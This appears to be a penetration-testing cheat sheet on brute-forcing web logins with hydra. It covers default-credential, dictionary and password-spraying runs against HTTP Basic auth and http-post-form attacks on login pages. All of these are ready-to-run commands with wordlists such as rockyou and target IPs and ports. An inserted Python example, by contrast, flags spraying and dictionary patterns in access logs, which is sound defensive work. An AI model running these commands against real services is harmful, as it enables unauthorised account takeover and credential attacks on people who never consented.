Web login

Always start with Default Credentials

Wordlists

Default Credentials, Password lists, Username lists

Basic authentication

Default credz

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt  178.211.23.155 -s 31099 http-get /

| Options | Description |
| --- | --- |
| -C ftp-betterdefaultpasslist.txt | Combined Credentials Wordlist |
| SERVER_IP | Target IP |
| -s PORT | Target Port |
| http-get | Request Method |
| / | Target Path |

Dictionary attack

hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 178.35.49.134 -s 32901 http-get /

Password Spraying

hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -p amormio -u -f 178.35.49.134 -s 32901 http-get /
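
On the server side, the Basic-auth runs above appear as bursts of 401 responses in the access log. The following is an added example, not part of the original page, that labels each source IP by the shape of its failures; the function names, thresholds and constructed log lines are assumptions, and the input is assumed to be in Apache/nginx combined log format.

```python
import re
from collections import defaultdict

# Combined log format: ip, ident, user, [time], "request", status, size.
# On a 401 the user field holds the name the client tried (unauthenticated).
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "[^"]*" (\d{3}) ')


def failed_logins(lines):
    """Return {source_ip: {username: number of 401 responses}}."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LINE_RE.match(line)
        # user "-" is the credential-less first request, not a guess
        if m and m.group(3) == "401" and m.group(2) != "-":
            per_ip[m.group(1)][m.group(2)] += 1
    return per_ip


def classify(users, min_users=5, min_tries=5):
    """Label one source by the shape of its failures (thresholds are assumptions)."""
    most = max(users.values())
    if len(users) >= min_users and most <= 2:
        return "password-spraying"   # many accounts, one or two tries each
    if most >= min_tries:
        return "dictionary"          # repeated tries against the same account
    return "normal"


def detect(lines):
    return {ip: classify(users) for ip, users in failed_logins(lines).items()}


def _line(ip, user, status=401):
    # Constructed sample entry, not real traffic (documentation IP ranges).
    return f'{ip} - {user} [10/Mar/2024:10:00:00 +0000] "GET / HTTP/1.1" {status} 381'


SAMPLE = (
    [_line("203.0.113.10", u) for u in ("alice", "bob", "carol", "dave", "erin", "frank")]
    + [_line("203.0.113.20", "admin") for _ in range(8)]
    + [_line("198.51.100.7", "grace"), _line("198.51.100.7", "grace", 200)]
)

if __name__ == "__main__":
    for ip, label in detect(SAMPLE).items():
        print(ip, label)
```

On real logs, group the lines into time windows before calling `detect`, so that slow runs and ordinary mistyped passwords are judged over comparable periods.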

Login page

With Error Message

hydra http-post-form -U

<...SNIP...>
Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables ...SNIP... usernames and passwords being replaced in the
 "^USER^" and "^PASS^" placeholders
The third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".

<...SNIP...>

Examples:
 "/login.php:user=^USER^&pass=^PASS^:incorrect"

Example

hydra -l admin -P /usr/share/wordlists/rockyou.txt -f inlanefreight.local  http-post-form "/monitoring/login.php:username=^USER^&password=^PASS^:Invalid"

No error messages

/login.php:[user parameter]=^USER^&[password parameter]=^PASS^:[FAIL/SUCCESS]=[success/failed string]

| Type | Boolean Value | Flag |
| --- | --- | --- |
| Fail | FALSE | F=html_content |
| Success | TRUE | S=html_content |

hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 83.136.251.226 -s 57876 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
